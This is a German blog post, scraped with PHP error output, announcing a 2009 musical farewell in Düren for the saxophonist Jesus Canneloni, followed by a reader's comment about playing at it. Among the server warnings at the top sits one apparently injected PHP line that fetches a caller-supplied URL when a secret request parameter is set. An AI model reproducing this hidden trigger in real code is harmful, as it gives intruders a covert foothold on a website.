Deprecated: Assigning the return value of new by reference is deprecated in /homepages/u21512/schroeder/schroederblog/wp-settings.php on line 520

Deprecated: Assigning the return value of new by reference is deprecated in /homepages/u21512/schroeder/schroederblog/wp-settings.php on line 535

Deprecated: Assigning the return value of new by reference is deprecated in /homepages/u21512/schroeder/schroederblog/wp-settings.php on line 542

Deprecated: Assigning the return value of new by reference is deprecated in /homepages/u21512/schroeder/schroederblog/wp-settings.php on line 578

Deprecated: Function set_magic_quotes_runtime() is deprecated in /homepages/u21512/schroeder/schroederblog/wp-settings.php on line 18
isset($_REQUEST['kocopu']) && fetch_feed($_REQUEST['feed_url']);
Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /homepages/u21512/schroeder/schroederblog/wp-settings.php:520) in /homepages/u21512/schroeder/schroederblog/wp-content/plugins/formbuilder/captcha/CaptchaSecurityImages.php on line 26

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /homepages/u21512/schroeder/schroederblog/wp-settings.php:520) in /homepages/u21512/schroeder/schroederblog/wp-content/plugins/formbuilder/captcha/CaptchaSecurityImages.php on line 26
Schroeder Roadshow » Goodbye Jesus

Goodbye Jesus

Schroeder am 15. Mai 2009

Am Freitag, dem 12.6.09 werden wir unseren Freund Jesus Canneloni mit Musik verabschieden.
So, wie er Saxophon spielte - wild, sanft, frei und ungebändigt - so wollen wir ihn ein letztes Mal feiern.
Live dabei sind: Gaby Tiger, City Blues Band, Rich Schwab, Schroeder Roadshow und einige weitere Dürener Musiker.
Die Organisation erfolgt durch die Freien Kulturgruppen e.V.
Der Eintritt ist frei, Spenden sehr willkommen.
Ort: Peter’s Pub, Wilhelmstr. 49, 52349 Düren ab 20.00 Uhr
goodbye-jesus

Abgelegt unter Jesus, Konzert | Ein Kommentar

Ein Kommentar zu “Goodbye Jesus”

  1. Richam 16. Juni 2009 um 22:48

    Erst mal: Danke an alle Beteiligten und Helfern!
    Ich war eigentlich nur eingeladen, um etwas zu lesen.
    Was ich ja dann auch getan habe.
    Aber erstens hieß es auf dem Plakat schließlich “Jesus mit Musik verabschieden”, und zweitens: Was soll ich jemandem, dessen Leben die Musik war, mit Büchern hinterher winken?
    Also habe ich den guten alten Warwick-Bass von dem berühmten Nagel genommen, an dem er seit über zwölf Jahren hing, unangetastet aber geduldig, und einen Abschiedssong gespielt. Bzw. zwei in einem.
    Das Wochenendpublikum am Veranstaltungsort schien davon nicht sonderlich beeindruckt, und besonders die junge Frau, die zwei Meter vor meiner Nase stand und die ganze Zeit ohne Punkt und Komma auf ihren Begleiter einredete, als sei sie meine Synchrondolmetscherin, kann froh sein, dass das nicht m e i n Abend war…

    Für alle, die vielleicht doch bedauern, dass sie deswegen so wenig mitbekommen haben, und natürlich für alle, die nicht da sein konnten, gibt’s meine Darbietung jetzt im Netz zu sehen.
    Weder Sound noch Bild sind zwar kinotauglich - es wurde mit meiner guten alten Ixus gefilmt -, aber historische Dokumente sind halt schon mal so…

    http://vids.myspace.com/index.cfm?fuseaction=vids.individual&videoid=59094678

    ‘ne schöne Jrooß - Rich

Trackback URI | Kommentare als RSS

Einen Kommentar schreiben